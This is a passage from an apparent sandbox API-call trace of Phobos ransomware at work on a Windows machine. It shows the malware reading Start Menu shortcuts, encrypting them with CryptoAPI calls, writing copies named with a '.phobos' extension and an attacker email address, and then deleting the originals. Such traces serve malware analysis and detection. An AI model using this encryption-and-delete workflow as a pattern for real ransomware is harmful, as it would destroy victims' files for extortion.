nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0211.130] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.130] CloseHandle (hObject=0xac) returned 1 [0211.130] CloseHandle (hObject=0xfc) returned 1 [0211.130] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\mail recipient.mapimail")) returned 1 [0211.131] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0211.131] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.132] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1358) returned 1 [0211.132] CloseHandle (hObject=0xfc) returned 1 [0211.132] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk")) returned 0x20 [0211.132] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.132] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.132] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.132] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.133] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.133] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0211.133] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.133] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x54e, lpOverlapped=0x0) returned 1 [0211.224] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x550, dwBufLen=0x550 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x550) returned 1 [0211.224] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x550, lpOverlapped=0x0) returned 1 [0211.225] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0211.225] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.225] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0211.225] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.225] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0211.225] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.225] CloseHandle (hObject=0xfc) returned 1 [0211.225] CloseHandle (hObject=0xac) returned 1 [0211.226] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk")) returned 1 [0211.226] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0211.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\magnify.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.227] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1258) returned 1 [0211.227] CloseHandle (hObject=0xac) returned 1 [0211.227] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\magnify.lnk")) returned 0x20 [0211.227] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\magnify.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\magnify.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.227] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.227] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\magnify.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.228] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0211.228] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.228] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4ea, lpOverlapped=0x0) returned 1 [0211.230] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4f0, dwBufLen=0x4f0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4f0) returned 1 [0211.230] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4f0, lpOverlapped=0x0) returned 1 [0211.231] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0211.231] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.231] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0211.231] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.231] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0211.231] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.231] CloseHandle (hObject=0xac) returned 1 [0211.231] CloseHandle (hObject=0xfc) returned 1 [0211.231] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\magnify.lnk")) returned 1 [0211.233] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0211.233] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\narrator.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.233] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1262) returned 1 [0211.233] CloseHandle (hObject=0xfc) returned 1 [0211.233] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\narrator.lnk")) returned 0x20 [0211.233] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\narrator.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.233] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\narrator.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.234] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.234] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\narrator.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.234] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0211.234] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.234] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4ee, lpOverlapped=0x0) returned 1 [0211.236] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4f0, dwBufLen=0x4f0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4f0) returned 1 [0211.236] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4f0, lpOverlapped=0x0) returned 1 [0211.236] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0211.236] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.236] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0211.236] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.236] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0211.237] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.237] CloseHandle (hObject=0xfc) returned 1 [0211.237] CloseHandle (hObject=0xac) returned 1 [0211.237] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\narrator.lnk")) returned 1 [0211.238] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0211.238] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.238] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1250) returned 1 [0211.238] CloseHandle (hObject=0xac) returned 1 [0211.238] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk")) returned 0x20 [0211.238] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.238] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.238] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.238] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.239] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0211.239] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.239] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4e2, lpOverlapped=0x0) returned 1 [0211.240] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4f0, dwBufLen=0x4f0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4f0) returned 1 [0211.240] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4f0, lpOverlapped=0x0) returned 1 [0211.241] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0211.241] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.241] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0211.241] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.241] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0211.241] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.241] CloseHandle (hObject=0xac) returned 1 [0211.241] CloseHandle (hObject=0xfc) returned 1 [0211.241] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk")) returned 1 [0211.242] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0211.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\command prompt.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.243] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1280) returned 1 [0211.243] CloseHandle (hObject=0xfc) returned 1 [0211.243] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\command prompt.lnk")) returned 0x20 [0211.243] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\command prompt.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.243] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\command prompt.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.243] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.243] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.243] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\command prompt.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.244] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0211.244] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.244] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x500, lpOverlapped=0x0) returned 1 [0211.245] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x510, dwBufLen=0x510 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x510) returned 1 [0211.245] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x510, lpOverlapped=0x0) returned 1 [0211.246] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0211.246] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.246] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0211.246] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.246] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0211.246] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.246] CloseHandle (hObject=0xfc) returned 1 [0211.246] CloseHandle (hObject=0xac) returned 1 [0211.246] DeleteFileW 